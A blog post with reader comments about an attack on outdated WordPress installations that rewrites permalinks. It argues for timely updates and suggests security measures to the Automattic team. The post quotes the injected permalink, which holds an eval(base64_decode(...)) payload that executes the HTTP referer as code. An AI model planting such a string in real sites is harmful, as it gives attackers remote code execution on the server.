My apologies for not updating the blog since long time. Thanks to Vivekk for point it out to me and reminding me about that how he’s missing the content of this blog (definitely makes me feel good). Coming back to the actual blog post and the talks of WordPress not being a secure blog engine and the questions being raised about the security of WordPress tells me that how we all tend to blame others for our own faults!

Recently, there have been reports that older versions of WordPress self-hosted blogs are under attack by an online creature named “eval/base64_decode” that changes the Permalinks (URL-Structure) of your blog posts such as : example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.

Why I say that it’s our own fault?

WordPress team has been working hard all the time to give us new features in the new versions. They have been quick enough to supply the security updates, in case there is any in the new versions. It’s only the bloggers who don’t really give importance to these new updates by not updating the engines and we tend to raise the question about WordPress Security or play the blame game after our blog’s get attacked by these nasty tricks played by “some jerk”.

Will it be not your fault, if you don’t lock the doors of your house and go out on a holiday. Will it not be like, giving an open invitation to thieves? It’s exactly the same here as well, by not upgrading your WordPress installations, you are inviting hackers to exploit your blog.

What all can I do to keep my blog safe?

I’ve already written a series on how to secure your WordPress installations and I’m sure that those safety measures will surely keep your blog safe from prying eyes. However, that are the safety measures that you can take. However, if your blog is already hit by “eval/base64_decode” then you should go ahead and follow these FAQ on how you can save yourself from this nasty attack.

Suggestions for the Automattic team

Considering that how WordPress has grown in the internet world and how other engines are secure enough that they don’t get attacked by these exploits (It’s pretty much same as why Microsoft Windows gets viruses and other operating systems don’t), there are certain suggestions for the Automattic team that they should implement to keep things more secure than ever -

1. Certify the plugins – This wonderful suggestion came from Allen Stern and I think he’s right on the money. If there will be a system in WordPress or someone who’d look in the code of every WordPress plugin that’s uploaded on WordPress Extend, then it’ll give more assurance to the bloggers about the authenticity of the plugin.

2. Put Some WatchDogCorsin Camichel suggests that it’ll be nice if the bloggers get an automated report every day by WordPress installation that tells them about the activity of the blog. I’m sure that a person will get alerted if he sees that 30 new posts were added on his/her blog when he was busy somewhere else.

3. Educated users through WordPress.TV – WordPress.TV is an excellent resource that has lots of videos that educate users about various sections of WordPress. I’m sure bloggers will certainly appreciate if they can get more videos (other than this video) on the topic of security and what all they can do to keep their blogs safe from prying eyes.

If you have any more suggestions for the Automattic team, then why not take part in the conversation and let them know that what all we are expecting from them! <sarcasm>After all, it was their fault that they built such a wonderful app; people will automatically have lot more expectations from them.</sarcasm>

Is your blog doesn’t look as cool as other blogs? Feel free to contact us (Free quote) and we’d love to help you in building a beautiful blog for you!

6 Comment

Featured Designs

Parent Society

Parent Society

Marijuana Maps

Marijuana Maps

Cake Journal

Cake Journal

CopyKat Recipes

CopyKat Recipes

Jessica Denay

Jessica Denay

Keith Ferrazzi

Keith Ferrazzi

Rennaissance Yoga

Rennaissance Yoga

Brink Zone

Brink Zone

Illustrious Author

Illustrious Author

Boca Care

Boca Care

KingsCast

Kingscast

Notecook

Note Cook

My Business Musings

My Business Musings

6 Responses so far | Have Your Say!

  1. Thanks for linking to me and keeping the discussion alive.
    I have discussed with Allen yesterday a little bit about the whole incident. And as much as I like the idea to certify plugins, I wonder what happen to all the plugins I wrote for just one of my blogs? If WordPress allows to install un-certified plugins, the system is broken already. And if they do not allow that, my plugins are useless. It is going to be hard to have a balance between the two.

    • @corsin – thanks for dropping by and keeping the discussion going on :) As far as the plugins that one has developed for his/her blog will mean that they already know the plugin is safe to use and that it will not be malicious. Other than that, it will be good if WordPress will certify the plugins – that process will encourage plugin developers to get their plugins certified from them as it will give assurance to the plugin users that they are using a safe plugin and that it’s not malicious. This process will take time, eventually it will become part of the system.. isn’t it :)

  2. hi mayank
    I hope my plugins are safe :) at least they should.
    My thought goes more in the direction of what happens, once WordPress only allows to install verified/certified plugins. I do not think somebody wants to certify my plugin that creates a database connection and returns a random joke :-)

  3. Thanks for the links! This whole exploit blowup has been interesting to watch. I’ve been hit so many times over the last 3 months that I should become a hacker :)

  4. Alex

    Re Corsin’s suggestion, I’ve made ismyblogworking.com detect this exploit and several others. If you subscribe to the RSS feed there for your blog(s) you’ll get an update if your blog is compromised by one of them. It’ll also warn you to update if your copy of WordPress is out of date (cough cough).

  5. Wow, what luck I stumbled on this today. I just noticed that my wordpress permalinks had changed, and couldn’t for the life of me figure out what happened.

    So yes, I must be one of the lazy bloggers who doesn’t upgrade their platform enough :)